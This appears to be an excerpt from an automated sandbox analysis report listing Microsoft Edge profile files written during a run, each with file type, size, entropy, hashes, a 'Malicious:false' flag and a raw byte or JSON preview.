                                                                                                                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):40960
                                                                                                                                          Entropy (8bit):0.4918217996108988
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcBuozWl0b/:v7doKsKuKZKlZNmu46yjxuuZ
                                                                                                                                          MD5:98DD6740F249881C2370FCD7E8154500
                                                                                                                                          SHA1:E2D1D85E29215639795D7B25390DDAFE8B4C1484
                                                                                                                                          SHA-256:DE68F57A99F2027D359B62832001F253D8D08CE2F1FCD069FFB57A8A06EA44FC
                                                                                                                                          SHA-512:24E4D7EC6442808C27A05EC88DE0429C669090121E2979104AE19A227086E795874056C376BEB8CE118F4A24D2F9F76D31E817AE05D5E93AE4F2237048D8B96B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\af4edde4-9600-4c91-92a3-288cca22f113.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):26125
                                                                                                                                          Entropy (8bit):5.551283102880555
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:Ryh3dzkZWPGQfK18F1+UoAYDCx9Tuqh0VfUC9xbog/OV3mx9FrwipCtu9:Ryh3dIZWPGQfK1u1jamk9u7t2
                                                                                                                                          MD5:FEF3249E36256367F6608BD5C82A8DA3
                                                                                                                                          SHA1:385DFB3C5A4F741F9B657DB4FA39D8DD7B20B1AF
                                                                                                                                          SHA-256:6777C13C13B7E7596E4C4EF66C332A1B9FFA674BF10F2B0DCDE6DCA038CEA3E8
                                                                                                                                          SHA-512:788096DFE0072293FB6184FE2019C3381DF5401CA87619DAB9A5712471478489BD05D3A763FB99E2C45A971840631FE0417A51FD7AA0C346D78E435F39F52955
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13357379679150389","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13357379679150389","location":5,"ma

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):11755
                                                                                                                                          Entropy (8bit):5.190465908239046
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                          MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                          SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                          SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                          SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c15644d2-ceae-498a-b14a-404ea8df9240.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):10573
                                                                                                                                          Entropy (8bit):5.211008099067656
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:stKkdps+s5ssZih+tv5nKRkbYM8vbV+FC8QA66WuFlaFIMYgPnYJ:stKQXs5sfh+5EbGlQx6WglaTY1
                                                                                                                                          MD5:A50CCA569FB615D2D2512D98F4E31FA9
                                                                                                                                          SHA1:60E65F99AB05CB63EF11550C052606378EC2B5B2
                                                                                                                                          SHA-256:40AC4ECB4C636C90B71D26D3CBD047B4B5D530A843ECFBBC41DD83E612EC4FB4
                                                                                                                                          SHA-512:FA0DA13547F1C8D6354180423B353B18C6F1BC5A526111F60173560A29AA47731FA5479B9D429A5FAA03E2BB1D52034AAA8627F8172CBBA8BCB7FEAD94E26901
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13357379679684250","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):28672
                                                                                                                                          Entropy (8bit):0.3410017321959524
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                          MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                          SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                          SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                          SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\de589552-6a0e-4e87-983b-131ad3b00f85.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):10573
                                                                                                                                          Entropy (8bit):5.211331113693219
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:stKkdps+s5ssZih+tv5nKRkbYM8vbV+FC8QA66W9FlaFIMYgPnYJ:stKQXs5sfh+5EbGlQx6WblaTY1
                                                                                                                                          MD5:052424632CAD14C3FE4D9FE5534DAB0E
                                                                                                                                          SHA1:D226865A6D1BD2A9B7B1DFD17DE212C096C0913F
                                                                                                                                          SHA-256:57ABFCFECD209541B4B81D6488CC1E958CCC95D190EC60F4609E8A0161A52515
                                                                                                                                          SHA-512:B9DF36BE45428E8EFA6C98B7CF427A94F1B55C00D7242A160348DABC557F7F8A205073B73B4DF65931061EBDED3A2E9F11DD23F2D62AAAE56437E01800BA88DC
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13357379679684250","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):32768
                                                                                                                                          Entropy (8bit):0.0536030015952279
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:GtStut5j+uCStut5j+unyR9XCChslotGLNl0ml/Vl/XoQXEl:MtwuctwunyLpEjVl/PvoQ
                                                                                                                                          MD5:7C9F2AF80B54FC673B2AC3A0993073FF
                                                                                                                                          SHA1:78D44944E0517D26FB965161B4914A75E6229227
                                                                                                                                          SHA-256:D23026013BD45E5F23E6C78AB9AEBABBE27866727A13EEA1C9C3C7E00DB135FB
                                                                                                                                          SHA-512:8F36CC9FA1FC56A33B9B2F6C602E3DFA02D8D8BF7AB9FB50B67C82D803282AF8E4E455E551F800793AB59E8C138BC23F86571C12281A0D034F3E27AC9FED93FE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:..-........................sJ4P..4..}...d...*....-........................sJ4P..4..}...d...*..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):86552
                                                                                                                                          Entropy (8bit):0.8699130469066906
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:ywXzx8I/02TlO+scbX+on9VAKAFXX+hV2VAKAFXX+n8xOqVAKAFXX+vqnUYVAKAC:jjx7/02b2dNshTNsOO5NsvlNsEYP
                                                                                                                                          MD5:305E0AF977A48EB84A2807906A20F076
                                                                                                                                          SHA1:7536E085B9256BA32C99DBC2605664F3CFCD859A
                                                                                                                                          SHA-256:EDD415DB727863E105A079E8415C5FE8A053ADC907069DCDA75F11851E9A01EA
                                                                                                                                          SHA-512:3BC0F8167E103A54338A83452BE56BE0ABE50B5BBED9D522ECF05233DA1DFDEACC4AB8E9A68C96B0C10EDD675E36BE2653A0B5DFB059C6460CE96844DD899ED5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):789
                                                                                                                                          Entropy (8bit):3.520039519019203
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:Wlc8NOuuuuuuuuuuuuuuuuuuuurllvjYnH8dkTSlkTSlkTSlkTSlkT:iDglvjYub999
                                                                                                                                          MD5:66FE3B22BC5A53642763F8A45EBDCA2C
                                                                                                                                          SHA1:96E0AB2263923A6654B668846B71BFD3C141E557
                                                                                                                                          SHA-256:57F080B64DD8A9B923993D6F5AD4F151C0BD5CF922C2E051E816064BD1F69641
                                                                                                                                          SHA-512:6C3AB617DB6DD86BCA49C96AE9EC4BD3D4D321497374DB3B42412B7A94F887619388A81266D48BB7257B338364ABF13DBE2BE92A787AFDF4CFF3A6C24048DDD3
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...................;...............#38_h.......6.Z..W.F.....)pd.....)pd..........V.e................V.e................V.e....................0................39_config..........6.....n ....12B.l...............2B.l...............2B.l...............2B.l...............2B.l...............

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):324
                                                                                                                                          Entropy (8bit):5.220425574858058
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C1yAq2P923oH+TcwtfrK+IFUt8N1yhZmw+N1y7kwO923oH+TcwtfrUeLJ:CMAv4Yeb23FUt8NMh/+NM75LYeb3J
                                                                                                                                          MD5:24D12A014D9FF8D5F7A09551D58541E7
                                                                                                                                          SHA1:BF2DF9F29CE6A5230A7B8B8547D3E7BF56677410
                                                                                                                                          SHA-256:5B9244DA7F2AABE997DAED57DBFDB70E1B25B94466E63506C645533A6FFBD171
                                                                                                                                          SHA-512:6922697B600210935C32A2ED2350B254D71F609C1DDB6D4BB51291BA0C241E008749A47EA5A3011DF96C2AE08397CCE6FDC8108FD21EC5CE33BBBA94C232EAB9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:39.715 1fb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/04/12-09:14:39.715 1fb0 Recovering log #3.2024/04/12-09:14:39.715 1fb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):324
                                                                                                                                          Entropy (8bit):5.220425574858058
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C1yAq2P923oH+TcwtfrK+IFUt8N1yhZmw+N1y7kwO923oH+TcwtfrUeLJ:CMAv4Yeb23FUt8NMh/+NM75LYeb3J
                                                                                                                                          MD5:24D12A014D9FF8D5F7A09551D58541E7
                                                                                                                                          SHA1:BF2DF9F29CE6A5230A7B8B8547D3E7BF56677410
                                                                                                                                          SHA-256:5B9244DA7F2AABE997DAED57DBFDB70E1B25B94466E63506C645533A6FFBD171
                                                                                                                                          SHA-512:6922697B600210935C32A2ED2350B254D71F609C1DDB6D4BB51291BA0C241E008749A47EA5A3011DF96C2AE08397CCE6FDC8108FD21EC5CE33BBBA94C232EAB9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:39.715 1fb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/04/12-09:14:39.715 1fb0 Recovering log #3.2024/04/12-09:14:39.715 1fb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):787
                                                                                                                                          Entropy (8bit):4.059252238767438
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                          MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                          SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                          SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                          SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):342
                                                                                                                                          Entropy (8bit):5.24547518627433
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C14duq2P923oH+TcwtfrzAdIFUt8N14dzdZmw+N14dzvkwO923oH+TcwtfrzILJ:CSIv4Yeb9FUt8NSBd/+NSBv5LYeb2J
                                                                                                                                          MD5:FC222CE738C1F4B6E1056E058ACCC731
                                                                                                                                          SHA1:BDE11653D7BFFC58D3005FB267D4E3AFA3E9E06F
                                                                                                                                          SHA-256:8C35B6A7541333F66B8CEAA9EFEC93844BC7FA45E7DA1D0B4EEB26D2FC3CD9BC
                                                                                                                                          SHA-512:36CADD769C247B1AE879E19C56E4F7BFE3BD8BFC3F2AB0D0B088B1EF1CE626B3CBC5B37CBDC801BCD0F362BC69D47234F595848DE099FF482C6D733BDAA44A21
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:39.685 1fb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/04/12-09:14:39.687 1fb0 Recovering log #3.2024/04/12-09:14:39.687 1fb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):342
                                                                                                                                          Entropy (8bit):5.24547518627433
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C14duq2P923oH+TcwtfrzAdIFUt8N14dzdZmw+N14dzvkwO923oH+TcwtfrzILJ:CSIv4Yeb9FUt8NSBd/+NSBv5LYeb2J
                                                                                                                                          MD5:FC222CE738C1F4B6E1056E058ACCC731
                                                                                                                                          SHA1:BDE11653D7BFFC58D3005FB267D4E3AFA3E9E06F
                                                                                                                                          SHA-256:8C35B6A7541333F66B8CEAA9EFEC93844BC7FA45E7DA1D0B4EEB26D2FC3CD9BC
                                                                                                                                          SHA-512:36CADD769C247B1AE879E19C56E4F7BFE3BD8BFC3F2AB0D0B088B1EF1CE626B3CBC5B37CBDC801BCD0F362BC69D47234F595848DE099FF482C6D733BDAA44A21
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:39.685 1fb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/04/12-09:14:39.687 1fb0 Recovering log #3.2024/04/12-09:14:39.687 1fb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):120
                                                                                                                                          Entropy (8bit):3.32524464792714
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                          MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                          SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                          SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                          SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):13
                                                                                                                                          Entropy (8bit):2.7192945256669794
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                          MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                          SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                          SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                          SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:117.0.2045.47

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):44137
                                                                                                                                          Entropy (8bit):6.090776782579777
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMCwuF9hDO6vP6O+Wtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6/tbz8hu3VlXr4CRo1
                                                                                                                                          MD5:1AF0B68F6B69583321EA260D915383B4
                                                                                                                                          SHA1:2371D22CAF4D75D1042CD9EB3ED60393E770AA2F
                                                                                                                                          SHA-256:9F918F6A57C456F8D5FA6649FE01C6ACBAF4DD6EB51939ED7607D1594411C608
                                                                                                                                          SHA-512:7CD5840D7F377A794DD9699B68DB05A57F0673AD31E442D294E69BE3B730D37196819F30519AB45B9287B389D63FCF21232BEC37E7CFB256FF522B4731271F09
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF33dc5.TMP (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):44137
                                                                                                                                          Entropy (8bit):6.090776782579777
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMCwuF9hDO6vP6O+Wtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6/tbz8hu3VlXr4CRo1
                                                                                                                                          MD5:1AF0B68F6B69583321EA260D915383B4
                                                                                                                                          SHA1:2371D22CAF4D75D1042CD9EB3ED60393E770AA2F
                                                                                                                                          SHA-256:9F918F6A57C456F8D5FA6649FE01C6ACBAF4DD6EB51939ED7607D1594411C608
                                                                                                                                          SHA-512:7CD5840D7F377A794DD9699B68DB05A57F0673AD31E442D294E69BE3B730D37196819F30519AB45B9287B389D63FCF21232BEC37E7CFB256FF522B4731271F09
                                                                                                                                          Malicious:false
